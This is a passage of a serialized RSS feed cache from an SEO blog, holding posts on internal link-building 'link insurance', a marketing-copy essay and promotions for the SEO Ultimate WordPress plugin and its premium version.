<strong>5)</strong> publish your content<br />\n<strong>6)</strong> build links back to the old page (using social bookmarking or other ethical link building methods) to flow link weight back to your site and your new page.</p>\n<p>When the page gets crawled, it already has the ranking factors intact, relevance and an endorsement from your own internal links. This is a great strategy for a maiden voyage for a new page, although this is a rudimentary version of the tactic, you can see the value in building links to your links.</p>\n<p>Every three months, you could essentially go back through your analytics, look at the most searched keywords, perform an audit and ensure that your older links are getting enough nurturing as a result of fresh links. The stronger they are the stronger your site is.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=SbAgitQy41g:ytdtE7dvXFE:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/SbAgitQy41g\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:444:\"I Just wanted to share a quick SEO strategy for balancing link weight. Have you ever used a tiered link strategy? Although there may be other names for it, personally, I call this link insurance (insurance in the sense that just in case you need it). Since the value of links is all based on <a href=\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:107:\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"30\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:102:\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\";}s:7:\"summary\";s:444:\"I Just wanted to share a quick SEO strategy for balancing link weight. Have you ever used a tiered link strategy? Although there may be other names for it, personally, I call this link insurance (insurance in the sense that just in case you need it). Since the value of links is all based on <a href=\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:5536:\"<p>I Just wanted to share a quick <a href=\"http://www.seodesignsolutions.com\">SEO</a> strategy for <strong>balancing link weight</strong>. Have you ever used a tiered link strategy? Although there may be other names for it, personally, I call this <strong>link insurance</strong> (insurance in the sense that just in case you need it).<br />\n<a href=\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\"><img class=\"aligncenter wp-image-9603 size-full\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance.jpg\" alt=\"link-weight-link-insurance\" width=\"400\" height=\"346\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance-300x260.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a></p>\n<p>Since the value of links is all based on the collective support they rally. The stronger the backlink the more value it can pass to your site as far as aiding your pages in maintaining or increasing positioning.<span id=\"more-204\"></span></p>\n<p>If you have ever tagged a site using social bookmarking, then you have scratched the surface. For example social bookmarking utilizes the premise of <strong>link insurance</strong>. Not only is it great to seal the deal with spiders (by getting their attention), but with enough inbound links strategically augmenting a page, it can provide long-term value for the <strong>link-freshness factor</strong> which can keep your internal pages buoyant and moving up in the search engine rankings.</p>\n<p>A stable authority site (built over time with a tremendous amount of link weight) has less chance of losing favor with search engine algorithms. However, what about other transient links, that drop off, get buried over time or the site architecture from the site offering the link is so taxed that by the time the pages are spidered <strong>they are tapped out</strong> as far as their real value is concerned? What is a viable solution to revive potential rankings?</p>\n<p><strong>The Solution: Building links to your links as insurance</strong></p>\n<p>I am not suggesting to abuse this tactic, what I am insinuating is, maintaining a stable influx of link juice into a site benefits all of the pages in that site (as long as you distribute the inbound links in moderation). The premise here is, <a href=\"http://seodesignsolutions.com/blog/link-building/balancing-link-diversity-link-velocity-and-link-volume/\">balancing</a> the ratios of content development to inbound links (and their various anchor and modifiers) along with systemic deep linking is the cornerstone of relevance of <a href=\"http://seodesignsolutions.com/blog/seo-basics/seo-basics-using-allinanchor-allintitle-allintext/\">SEO basics</a> in action.</p>\n<p>Links also can have more internal value from a page that was recently promoted in the Google algorithm. For example, if a page went from a page rank of zero to a PR2 or PR3 page in one update, if it gets indexed regularly and is succinctly tied to the sites main navigation, then you have an authority link right under your nose you can use to augment your main keywords as you wish.</p>\n<p>You can always review such content an amend it for a common goal. Ten links from <a href=\"http://seodesignsolutions.com/blog/link-building/using-deep-links-to-summon-search-engine-spiders/\">strong internal pages</a> to a sub folder or page buried deep in the site can change the landscape of a page or sites SEO value. Combining this with the fact that you can point new links from those pages at older links (to keep them fresh) or use them to kick off new content with a splash, the possibilities for recycling your sites internal link dynamo is promising.</p>\n<p><strong>One Example of the Equation:</strong></p>\n<p><strong>1)</strong> Find a slouching ranking and determine a keyword you want to invigorate<br />\n<strong>2)</strong> use a site:yourdomainname.com keyword (command) to find the most relevant page in your site<br />\n<strong>3)</strong> Build a new page using the <strong>main keyword in the title and text</strong><br />\n<strong>4)</strong> Link to the new page from the old page (with page rank) using the (keyword) as the anchor text / link text<br />\n <strong>5)</strong> publish your content<br />\n<strong>6)</strong> build links back to the old page (using social bookmarking or other ethical link building methods) to flow link weight back to your site and your new page.</p>\n<p>When the page gets crawled, it already has the ranking factors intact, relevance and an endorsement from your own internal links. This is a great strategy for a maiden voyage for a new page, although this is a rudimentary version of the tactic, you can see the value in building links to your links.</p>\n<p>Every three months, you could essentially go back through your analytics, look at the most searched keywords, perform an audit and ensure that your older links are getting enough nurturing as a result of fresh links. The stronger they are the stronger your site is.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=SbAgitQy41g:ytdtE7dvXFE:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/SbAgitQy41g\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:7;a:11:{s:5:\"title\";s:65:\"Your Website Needs Internal Links… Here’s How to Automate It!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/LfAszNY6W9E/\";s:8:\"category\";s:13:\"WordPress SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Thu, 13 Aug 2015 07:32:30 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9565\";s:7:\"content\";a:1:{s:7:\"encoded\";s:3193:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\"><iframe style=\"height: 378px;\" src=\"//fast.wistia.net/embed/iframe/ohcncbte4x?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"780\" height=\"376\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:0;margin-bottom:0;\"><a target=\"_blank\" href=\"https://seodesignframework.leadpages.co/leadbox/140f2faf3f72a2%3A12d9628a0b46dc/5712601648463872/\"><img src=\"https://lh3.googleusercontent.com/Y6docUak9NStgqgsc_2rDYRGMDTptUvMuJQkJ4q5PjEZrph49fgpg58ab75DTgrtBvY_WmikaTdIimQw3wiJHA=s0\"/></a></p>\n<p><script data-leadbox=\"140f2faf3f72a2:12d9628a0b46dc\" data-url=\"https://seodesignframework.leadpages.co/leadbox/140f2faf3f72a2%3A12d9628a0b46dc/5712601648463872/\" data-config=\"%7B%7D\" type=\"text/javascript\" src=\"https://seodesignframework.leadpages.co/leadbox-886.js\"></script></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:5px;\">\n<p>I know it&#8217;s been quiet on our blog, but, just to let you know&#8230;.we&#8217;ve been busy creating our new <strong>[10 Video] Advanced <a href=\"http://www.seodesignsolutions.com\">SEO</a> Training Series for SEO Ultimate</strong> and <a href=\"https://www.seoultimateplus.com/\" data-mce-href=\"https://www.seoultimateplus.com/\">SEO Ultimate+</a> so that people can really see the power of this amazing All-in-One solution for WordPress.</p>\n<p>I&#8217;ve added a teaser video above where I show you how to use the Deeplink Juggernaut&#8217;s <strong>Instant Post Propulsion</strong> technique to create auto-links for specific keywords (as well as dampen the volume of linking with the content link settings option).</p>\n<p>To get access to the entire 10 video series, just use the big blue button above to opt in. In the series we cover everything from:</p>\n<ul>\n<li>How to mass edit titles and meta tags.</li>\n<li>Indexation and crawl prioritization tips to prevent penalties.</li>\n<li>An introduction to structured markup.</li>\n<li>A walk-through of the new OpenGraph+ and Rich Snippets Creator modules&#8230;</li>\n</ul>\n<p>and much much more. But, you have to get access to the series first (which you can do using the <strong>Get More Training Like This</strong> button above).</p>\n<p>All the best,</p>\n<p>Jeffrey</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=LfAszNY6W9E:K62Ns01kLv4:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/LfAszNY6W9E\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:486:\"I know it&#8217;s been quiet on our blog, but, just to let you know&#8230;.we&#8217;ve been busy creating our new [10 Video] Advanced SEO Training Series for SEO Ultimate and SEO Ultimate+ so that people can really see the power of this amazing All-in-One solution for WordPress. I&#8217;ve added a teaser video above where I show <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/the-seo-ultimate-advanced-seo-video-training-series/\" class=\"read-more-excerpt\">Read More</a>\";s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:105:\"http://www.seodesignsolutions.com/blog/wordpress-seo/the-seo-ultimate-advanced-seo-video-training-series/\";}s:7:\"summary\";s:486:\"I know it&#8217;s been quiet on our blog, but, just to let you know&#8230;.we&#8217;ve been busy creating our new [10 Video] Advanced SEO Training Series for SEO Ultimate and SEO Ultimate+ so that people can really see the power of this amazing All-in-One solution for WordPress. I&#8217;ve added a teaser video above where I show <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/the-seo-ultimate-advanced-seo-video-training-series/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:3193:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\"><iframe style=\"height: 378px;\" src=\"//fast.wistia.net/embed/iframe/ohcncbte4x?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"780\" height=\"376\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:0;margin-bottom:0;\"><a target=\"_blank\" href=\"https://seodesignframework.leadpages.co/leadbox/140f2faf3f72a2%3A12d9628a0b46dc/5712601648463872/\"><img src=\"https://lh3.googleusercontent.com/Y6docUak9NStgqgsc_2rDYRGMDTptUvMuJQkJ4q5PjEZrph49fgpg58ab75DTgrtBvY_WmikaTdIimQw3wiJHA=s0\"/></a></p>\n<p><script data-leadbox=\"140f2faf3f72a2:12d9628a0b46dc\" data-url=\"https://seodesignframework.leadpages.co/leadbox/140f2faf3f72a2%3A12d9628a0b46dc/5712601648463872/\" data-config=\"%7B%7D\" type=\"text/javascript\" src=\"https://seodesignframework.leadpages.co/leadbox-886.js\"></script></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:5px;\">\n<p>I know it&#8217;s been quiet on our blog, but, just to let you know&#8230;.we&#8217;ve been busy creating our new <strong>[10 Video] Advanced <a href=\"http://www.seodesignsolutions.com\">SEO</a> Training Series for SEO Ultimate</strong> and <a href=\"https://www.seoultimateplus.com/\" data-mce-href=\"https://www.seoultimateplus.com/\">SEO Ultimate+</a> so that people can really see the power of this amazing All-in-One solution for WordPress.</p>\n<p>I&#8217;ve added a teaser video above where I show you how to use the Deeplink Juggernaut&#8217;s <strong>Instant Post Propulsion</strong> technique to create auto-links for specific keywords (as well as dampen the volume of linking with the content link settings option).</p>\n<p>To get access to the entire 10 video series, just use the big blue button above to opt in. In the series we cover everything from:</p>\n<ul>\n<li>How to mass edit titles and meta tags.</li>\n<li>Indexation and crawl prioritization tips to prevent penalties.</li>\n<li>An introduction to structured markup.</li>\n<li>A walk-through of the new OpenGraph+ and Rich Snippets Creator modules&#8230;</li>\n</ul>\n<p>and much much more. But, you have to get access to the series first (which you can do using the <strong>Get More Training Like This</strong> button above).</p>\n<p>All the best,</p>\n<p>Jeffrey</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=LfAszNY6W9E:K62Ns01kLv4:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/LfAszNY6W9E\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:8;a:11:{s:5:\"title\";s:49:\"Why Good Enough Just Isn’t Good Enough Anymore!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/h51XQfdCDXU/\";s:8:\"category\";s:8:\"Articles\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 01 Jul 2015 09:36:17 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9510\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2891:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/07/hooking-consumers.jpg\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Consumers Can See Through the Bait\"></div>\n</figure>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\">\n<p>You Can&#8217;t Be Serious?<br data-mce-bogus=\"1\"/></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>Let&#8217;s face it, times have changed and what worked yesterday has no guarantee of remaining relevant and working tomorrow.</p>\n<p>What most of us often overlook is that as the web evolves so does our nervous system and how it maps the priorities of how we communicate. Essentially, we develop blinders to keep us sane from information overload.</p>\n<p>Just like banner blindness is real, your ads, links, headlines, images and everything else <em>needs to be more human than ever</em> and have a more <strong>down to earth appeal</strong> vs. I&#8217;m selling you something (as if you don&#8217;t know it) if you ever want to see genuine conversions (which is why native advertising has displaced traditional ads).</p>\n<p>Yesterday&#8217;s marketing founded from the Madmen in the 60&#8217;s in today&#8217;s cinema plays like a bad dream we&#8217;ve been stuck in and trying to wake up from. </p>\n<p>The speaking at you vs. to speaking to you was blatantly overstated by them telling you what to do rather than listening and responding to your needs.</p>\n<p>So&#8230;making the shift from the old paradigm to the new paradigm of marketing is the basis of true engagement (<em>without offending your audiences intelligence)</em> as well as one of the safest ways to promote your brand while preserving its integrity.</p>\n<p>So, I challenge you to <strong>go back through your copy</strong>, your website and your communications and see whether or not you were writing it for YOU or for your CUSTOMERS?</p>\n<p>Just realize, it&#8217;s not too late&#8230; it&#8217;s just time to dust off your keyboard and make some worthwhile edits to boost conversions.</p>\n<p>The million dollar question is, are you writing what you THINK they want to hear, or communicating with clarity that they need to make an informed purchase?</p>\n<p>Until the next time.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=h51XQfdCDXU:sgo_RwnERfM:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/h51XQfdCDXU\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:474:\"You Can&#8217;t Be Serious? Let&#8217;s face it, times have changed and what worked yesterday has no guarantee of remaining relevant and working tomorrow. What most of us often overlook is that as the web evolves so does our nervous system and how it maps the priorities of how we communicate. Essentially, we develop blinders to <a href=\"http://www.seodesignsolutions.com/blog/articles/why-good-enough-just-isnt-good-enough-anymore/\" class=\"read-more-excerpt\">Read More</a>\";s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:94:\"http://www.seodesignsolutions.com/blog/articles/why-good-enough-just-isnt-good-enough-anymore/\";}s:7:\"summary\";s:474:\"You Can&#8217;t Be Serious? Let&#8217;s face it, times have changed and what worked yesterday has no guarantee of remaining relevant and working tomorrow. What most of us often overlook is that as the web evolves so does our nervous system and how it maps the priorities of how we communicate. Essentially, we develop blinders to <a href=\"http://www.seodesignsolutions.com/blog/articles/why-good-enough-just-isnt-good-enough-anymore/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:2891:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/07/hooking-consumers.jpg\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Consumers Can See Through the Bait\"></div>\n</figure>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\">\n<p>You Can&#8217;t Be Serious?<br data-mce-bogus=\"1\"/></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>Let&#8217;s face it, times have changed and what worked yesterday has no guarantee of remaining relevant and working tomorrow.</p>\n<p>What most of us often overlook is that as the web evolves so does our nervous system and how it maps the priorities of how we communicate. Essentially, we develop blinders to keep us sane from information overload.</p>\n<p>Just like banner blindness is real, your ads, links, headlines, images and everything else <em>needs to be more human than ever</em> and have a more <strong>down to earth appeal</strong> vs. I&#8217;m selling you something (as if you don&#8217;t know it) if you ever want to see genuine conversions (which is why native advertising has displaced traditional ads).</p>\n<p>Yesterday&#8217;s marketing founded from the Madmen in the 60&#8217;s in today&#8217;s cinema plays like a bad dream we&#8217;ve been stuck in and trying to wake up from. </p>\n<p>The speaking at you vs. to speaking to you was blatantly overstated by them telling you what to do rather than listening and responding to your needs.</p>\n<p>So&#8230;making the shift from the old paradigm to the new paradigm of marketing is the basis of true engagement (<em>without offending your audiences intelligence)</em> as well as one of the safest ways to promote your brand while preserving its integrity.</p>\n<p>So, I challenge you to <strong>go back through your copy</strong>, your website and your communications and see whether or not you were writing it for YOU or for your CUSTOMERS?</p>\n<p>Just realize, it&#8217;s not too late&#8230; it&#8217;s just time to dust off your keyboard and make some worthwhile edits to boost conversions.</p>\n<p>The million dollar question is, are you writing what you THINK they want to hear, or communicating with clarity that they need to make an informed purchase?</p>\n<p>Until the next time.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=h51XQfdCDXU:sgo_RwnERfM:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/h51XQfdCDXU\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:9;a:13:{s:5:\"title\";s:58:\"SEO Ultimate Launches Premium Version Called SEO Ultimate+\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/CLbuMSbKLvM/\";s:8:\"category\";s:120:\"WordPress SEOSEOSEO UltimateSEO Ultimate Goes PremiumSEO Ultimate WordPress Plugin UpdatedWordPressWordPress SEO Pluginm\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Tue, 30 Jun 2015 02:46:59 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9485\";s:7:\"content\";a:1:{s:7:\"encoded\";s:10438:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">We&#8217;re feeling SUPER (no tens inpunded&#8230;) and just wanted to give you all a quick <strong>heads up</strong> that there&#8217;s a new version of <strong><a href=\"http://www.seodesignsolutions.com\">SEO</a> Ultimate Version 7.6.5.7</strong> available for download from the <a href=\"https://wordpress.org/plugins/seo-ultimate/\">WordPress repository</a> or via your WordPress plugin dashboard.</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\"><iframe style=\"height: 400px;\" src=\"//fast.wistia.net/embed/iframe/qd5yjgfos1?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"700\" height=\"398\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\">The video above covers the free update, however, to see the premium version, keep scrolling ;)</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>As the numeric code implies (since it&#8217;s only incremental) that even though there were some <em>minor bug fixes</em>, this was mostly a cosmetic update to the plugin. </p>\n<p>You&#8217;ll find a few new resources and tools available for you in the SEO Admin Bar <strong>that we cover in the video above</strong>. Also, we&#8217;ve also covered some of the new tools that are accessible from the SEO admin bar. </p>\n<p></p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-left\">\n<h1>SEO Ultimate Goes Premium!</h1>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>Granted, truth be told, the real heavy lifting from this point on is going into <strong>the premium version of the plugin</strong> called <a href=\"https://www.seoultimateplus.com\" data-mce-href=\"https://www.seoultimateplus.com\">SEO Ultimate+</a>. We&#8217;re not going to pull any features, but all new ones move to +.</p>\n<p>For example, there&#8217;s over 7 months of coding time on one module to rewrite the base code of the Open Graph Integrator which has now shifted into its next embodiment&#8230;. (<em>like a caterpillar to a butterfly</em>) the <strong>OpenGraph+ Module</strong> which you can <a href=\"https://www.seoultimateplus.com/screencaps/\" data-mce-href=\"https://www.seoultimateplus.com/screencaps/\">see here</a>, with features like &#8230;</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:10px;\"><strong>Enjoy Simple, Easy-to-Implement Twitter Cards!</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/twitter-summary-card.jpg\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Create All 7 Twitter Cards with SEO Ultimate+\"></div>\n</figure>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:5px;\">\n<p>Now You Can Make Twitter Cards (all 7 types) with Ease! With No Fuss and No Mess!</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\" style=\"padding-top:5px;\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>More Powerful Page Level Settings</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:20px;margin-bottom:20px;\">\n<p>The premium version <strong><a href=\"https://www.seoultimateplus.com\" data-mce-href=\"https://www.seoultimateplus.com\">SEO Ultimate+</a></strong> handles Google+ customization, <strong>Open Graph / Facebook</strong> integration (on a page-by-page, post-by-post or mass edits 100 pages at a time).</p>\n<p>You can create all 7 types of Twitter cards&#8230;<strong>like a BOSS </strong>(<em>that validate flawlessly</em>) as well as there&#8217;s a powerful new arsenal of <strong>rich snippets </strong>to shoot up the SERPs ranging from <strong>Local SEO (Business), Events, Organization, People, Products, Recipes, Reviews, Software</strong> and <strong>Video</strong> (with more to come).</p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/Local-Page-Rich-Snippets.png\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"SEO Ultimate Page Level Rich Snippets\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/Local-Page-Rich-Snippets.png\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:20px;margin-bottom:20px;\">\n<p>There’s even a global fallback in SEO Ultimate+ in case you forget to add custom OG data at the page level where you can assign entire post types to as rules to a specific Open Graph type or specific type of Twitter Cards (<a href=\"https://dev.twitter.com/cards/types\" data-mce-href=\"https://dev.twitter.com/cards/types\">all 7 twitter cards</a> are available and validate).</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>Global Post Type Customization for Open Graph and Twitter Cards.</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/7-Twitter-Card-Types-1200x622.png\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Create Valid Twitter Cards with Ease\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/7-Twitter-Card-Types-1200x622.png\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>The New (Premium) OpenGraph+ Module and 7 New Rich Snippets</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>You can also mass edit pages and posts (up to 100 entries at a time and customize unique titles, meta descriptions, Open Graph, Google+, FB and Twitter inputs).</p>\n<p>Now that’s something you can’t do with the FREE version of SEO Ultimate…since it only has rich-snippets for <em>place</em> and <em>review</em> ;( and sorry guys <strong>no new features on the free version from now on</strong>, only bug fixes as all new feature development is moving exclusively the premium version SEO Ultimate+.</p>\n<p>In any case, this is only the beginning and we’ll be adding new features to SEO Ultimate plus, but don’t worry, there’s still plenty of horsepower in the free version (which you can get <a href=\"https://seodesignframework.leadpages.net/seo-ultimate-video-training/\" data-mce-href=\"https://seodesignframework.leadpages.net/seo-ultimate-video-training/\">FREE video training</a> for here). Before we leave, we&#8217;ll let you play the quick and dirty version of the OpenGraph+ Module video.</p>\n</div>\n</div>\n<div 